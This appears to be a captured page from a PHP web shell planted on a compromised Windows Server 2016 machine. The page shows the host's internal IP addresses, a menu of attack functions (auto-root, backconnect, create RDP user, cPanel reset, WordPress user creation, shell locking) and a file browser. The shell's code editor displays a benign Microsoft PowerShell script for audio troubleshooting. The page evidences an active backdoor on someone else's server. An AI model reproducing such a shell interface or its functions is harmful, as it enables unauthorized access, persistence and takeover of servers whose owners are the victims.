Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
Windows /
diagnostics /
system /
Audio /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US
[ DIR ]
drwxrwxrwx
AudioDiagnosticSnapIn.dll
17
KB
-rw-rw-rw-
AudioDiagnosticUtil.dll
11
KB
-rw-rw-rw-
CL_AudioDiagnosticSnapIn.ps1
1.15
KB
-rw-rw-rw-
CL_Invocation.ps1
1
KB
-rw-rw-rw-
CL_LoadAssembly.ps1
610
B
-rw-rw-rw-
CL_RunDiagnosticScript.ps1
384
B
-rw-rw-rw-
CL_Utility.ps1
66.31
KB
-rw-rw-rw-
DiagPackage.diagpkg
28.41
KB
-rw-rw-rw-
DiagPackage.dll
172
KB
-rw-rw-rw-
MF_AudioDiagnostic.ps1
10.54
KB
-rw-rw-rw-
RS_APOLoadFailure.ps1
1.6
KB
-rw-rw-rw-
RS_AudioService.ps1
2.5
KB
-rw-rw-rw-
RS_AudioServiceResponse.ps1
2.58
KB
-rw-rw-rw-
RS_ChangeVolume.ps1
1.68
KB
-rw-rw-rw-
RS_EnableInCPL.ps1
1.19
KB
-rw-rw-rw-
RS_HDAudioDriver.ps1
6.87
KB
-rw-rw-rw-
RS_NotDefault.ps1
6.51
KB
-rw-rw-rw-
RS_SamplingRate.ps1
1.29
KB
-rw-rw-rw-
RS_Unmute.ps1
1.11
KB
-rw-rw-rw-
TS_APOLoadFailure.ps1
4.99
KB
-rw-rw-rw-
TS_AudioDeviceDriver.ps1
1.49
KB
-rw-rw-rw-
TS_AudioService.ps1
1.59
KB
-rw-rw-rw-
TS_AudioServiceResponse.ps1
15.23
KB
-rw-rw-rw-
TS_DisabledInCPL.ps1
2.35
KB
-rw-rw-rw-
TS_HDAudioDriver.ps1
1.89
KB
-rw-rw-rw-
TS_LowVolume.ps1
2.45
KB
-rw-rw-rw-
TS_Mute.ps1
1.48
KB
-rw-rw-rw-
TS_NotDefault.ps1
1.79
KB
-rw-rw-rw-
TS_SamplingRate.ps1
1.49
KB
-rw-rw-rw-
TS_UnpluggedIn.ps1
1.82
KB
-rw-rw-rw-
VF_HDAudioDriver.ps1
2.85
KB
-rw-rw-rw-
VF_LowVolume.ps1
2.12
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RS_AudioServiceResponse.ps1
# Copyright © 2015, Microsoft Corporation. All rights reserved. #*================================================================================= <# RS_AudioServiceResponse resolves the problem related the audio services, Set the sevices to automatic and start services. Arguments: None Return values: None #> #*================================================================================= #Initialize #*================================================================================= function WaitFor-ServiceStatus([string]$serviceName=$(throw "No service name is specified"), [ServiceProcess.ServiceControllerStatus]$serviceStatus=$(throw "No service status is specified")) { <# Function description: Initailize the ServiceController for the audio services and wait for Time span of 5 minutes and get status of the service. Arguments: serviceName: String contains service name. serviceStatus: ServiceControllerStatus datatype contains error message "No service status is specified" Return values: None #> [ServiceProcess.ServiceController]$sc = New-Object "ServiceProcess.ServiceController" $serviceName [TimeSpan]$timeOut = New-Object TimeSpan(0,0,0,5,0) $sc.WaitForStatus($serviceStatus, $timeOut) } # Stop the Audio service Stop-Service Audiosrv -Force -ErrorAction SilentlyContinue WaitFor-ServiceStatus "Audiosrv" ([ServiceProcess.ServiceControllerStatus]::Stopped) Stop-Service AudioEndpointBuilder -Force -ErrorAction SilentlyContinue WaitFor-ServiceStatus "AudioEndpointBuilder" ([ServiceProcess.ServiceControllerStatus]::Stopped) # Check the audio service startup type $audioEndpointServicestartupType = (Get-WmiObject -query "select * from win32_baseService where Name='AudioEndpointBuilder'").StartMode $audioSrvstartupType = (Get-WmiObject -query "select * from win32_baseService where Name='Audiosrv'").StartMode # Change the audio service startup type to automatic if($audioEndpointServicestartupType -ne "auto") { (Get-WmiObject -query "select * from win32_baseService where Name='AudioEndpointBuilder'").changeStartMode("automatic") > $null } if($audioSrvstartupType -ne "auto") { (Get-WmiObject -query "select * from win32_baseService where Name='Audiosrv'").changeStartMode("automatic") > $null } Restart-Service AudioEndpointBuilder -Force -ErrorAction SilentlyContinue WaitFor-ServiceStatus "AudioEndpointBuilder" ([ServiceProcess.ServiceControllerStatus]::Running) Restart-Service Audiosrv -ErrorAction SilentlyContinue WaitFor-ServiceStatus "Audiosrv" ([ServiceProcess.ServiceControllerStatus]::Running)
Close